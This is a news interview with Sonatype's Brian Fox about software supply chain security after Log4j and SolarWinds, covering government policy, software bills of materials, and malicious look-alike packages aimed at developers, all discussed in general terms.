Open source security expert warns there is still a ‘long road’ ahead to prepare for the next attack wave
INTERVIEW The security of the software supply chain has rocketed up the infosec agenda since The Daily Swig last spoke to Brian Fox, co-founder and CTO at DevSecOps vendor Sonatype.
The landmark Log4j bug and SolarWinds supply chain attack in particular have prompted the White House to act with a clarity, swiftness, and even bipartisan support that has proved elusive in other policy areas.
Fox, who has sounded the alarm on supply chain security for many years, has welcomed the government’s belated recognition of the threat, but warns that the cybersecurity industry is still failing to sufficiently prioritize the issue.
Two years on from our last interview, the recently appointed OpenSSF governance board member also considers the legacy of ‘Log4Shell’, rebuffs criticism of the volunteer-driven open source model, and foresees attack techniques mutating when defenders finally ‘vaccinate’ themselves against current methods.
Daily Swig: Sonatype has been supporting White House efforts to bolster the software supply chain – how is that progressing?
Brian Fox: In the wake of the Log4j incident there was an initial [open source security] summit in January, testimony before the Senate and inquiries in the Senate and House, then the White House convened some meetings.
A follow-up summit in May with many participants across the ecosystem [resulted in a] 10-point mobilization plan that includes everything from better educating developers around secure practices, to better tooling, to funding, to audits of popular open source projects, to prioritizing the most used projects, driving better tooling around software bills of materials, [and] digital signatures...
A number of companies have made monetary pledges – [totalling] about $30 million – to help this effort, which is a lot, but estimates [of the sum needed] to drive all 10 streams were more like $150 million [over two years].
There’s some other tentative talks trying to get other governments involved, because this is not just a US-centric problem; it’s a global problem.
DS: So do you feel reassured that the US government is tackling the problem in broadly the right way?
BF: Generally, yes. The executive order a little over a year ago set in motion requirements for anybody selling software to the US government to have a reproducible software bill of materials [SBOM] to disclose all components – think food labels.
However, there was a [similar] bill before Congress in 2013 that didn’t get any airtime. So it’s nice to see it happening now but it would’ve been better to see it happening almost a decade ago.
I think there will be a trickle-down effect. Even software companies that don’t directly sell to the US government, if their consumers are selling to the US government, they’re going to have to provide a bill of materials all the way down, right?
DS: Are you still as frustrated as you were in 2020, when you lamented that “many companies still don’t have inventories of their open source components”?
BF: It’s improving, but I’m impatient. In the wake of Log4j, as of May 2022, 33% of Log4j downloads from the central repository in the last 24 hours were known vulnerable versions.
Six-plus months on [from the Log4j bug surfacing], was this acceptable? Everybody had a collective freakout, everybody was writing about it – there’s zero reason why you wouldn’t know about it.
Oftentimes companies with really good physical parts practices have terrible digital goods practices – that blows my mind. I don’t understand why I have to educate them.
PREVIOUS INTERVIEW Sonatype’s Brian Fox on open source security and ‘drama-free’ DevSecOps
The mobilization plan largely focuses on improving the open source projects. That needs to be done, but it largely misses the point that organizations have a responsibility to understand what components they’re using.
Take the Takata airbag incident. Let’s say all the [automotive] manufacturers were like, “we’re going to give Takata more money to make better airbags, so we no longer need to track which parts go into our cars” – we would laugh at them. But that’s kind of what’s happening right now [in the software supply chain].
Log4j was fixed and patched over Thanksgiving [within a day of the proof of concept surfacing] – but that doesn’t solve this problem [of users not updating their systems].
DS: What do you make of criticisms of the open source ecosystem’s volunteer-driven model?
BF: I don’t think throwing money at maintainers solves the problem. In fact, it can often complicate things, because then you have new people motivated only by money.
Most problems are not so simple as [maintainers] doing a terrible job. Take Log4j – it wasn’t even really a bug in the code. It was a weird interaction between a feature in Log4j and a feature in Java runtime that executed the JNDI code.
The kneejerk reaction is, “They’re volunteers, therefore they must be amateurs” – and that’s just not true. Most people working on these projects are in fact very good software developers working for big companies during the day. Oftentimes companies pay them to work on these projects.
DS: Can you summarize the current open source threat landscape and how Sonatype is helping developers protect the ecosystem?
BF: There’s a theoretical attack where a malicious committer shows up to a popular project and puts something malicious into a real package. So far that’s not happening.
Because consumers aren’t paying enough attention, it’s really easy to confuse them by creating a fake component with malware in it that sounds similar to the real component.
We’re trying to detect when components are malicious, or are anomalous, and stop consumers from accessing them via our firewall product. The [attack] targets are the developers and development infrastructure, and the bad behavior – the backdoor – is triggered as soon as you download it. They’re not trying to slip code into your software so that it gets distributed to your end user or to production.
So the only way to prevent that is to know, in real time, when that component hits the public repo, that there’s something wrong about it, and be able to stop it.
Timeliness is super important. Finding it six weeks later does no good because during that [time] everybody who touched it got tainted.
We use an MLAI [machine learning, artificial intelligence] technique, so we can train on new attacks and the model gets better and better. As of last month, we’ve reported more than 88,000 malicious packages using this technique, so it’s hundreds of orders of magnitude more [productive] than zero-day research.
DS: Are we likely to see attackers innovate in the way you envisaged – poisoning projects directly rather than duping developers – any time soon?
BF: They’re continuing to exploit the target vector I was talking about with sometimes more advanced attacks, but many just look like copycats.
We’ve seen this pattern before. It’s a bit like Covid – if everybody gets the vaccine then a mutation finds a way to work around it and that’s the one that survives.
But not enough people are immunized to the current round of attacks so we’re not seeing a ton of innovation.
That’s why we're finding and reporting dozens of these every, single day. It’s ridiculous.
But what happens when we get really good at [defense]? For over a decade and a half, I was afraid that the attackers would start focusing on the supply chain. That didn’t start happening until 2019.
So if we get good at blocking these easy-ish-to-detect things, then you’ll see them move into the projects with more insidious and difficult-to-detect attacks.
The [White House] mobilization plan will help open source projects become more inherently secure, but it’s a long road so I worry that we’re not gonna get there fast enough.
DS: How receptive has the industry been to your message about protecting the supply chain?
BF: Much of the industry is still fighting the last decade’s battle, which is doing static analysis, prioritizing vulnerabilities, and scanning products before they go into production or get distributed downstream.
Back in the 1990s browsers had vulnerabilities all over the place and, little did you know, you could get hacked just by loading a nefarious website.
That’s kind of what’s happening with these malicious attacks. The developers grab the wrong component, which isn’t trying to compile – it’s literally just a payload to deliver a backdoor or do whatever it does. So the developer’s build fails, and they realize it’s not the component they wanted [but not only that] they potentially got hacked.
If you only check what developers have committed or are building for release, you are blind to these 88,000-plus [monthly] attacks on developers’ machines.
We’ve been really leaning hard on that messaging and a lot of people are finally latching onto it.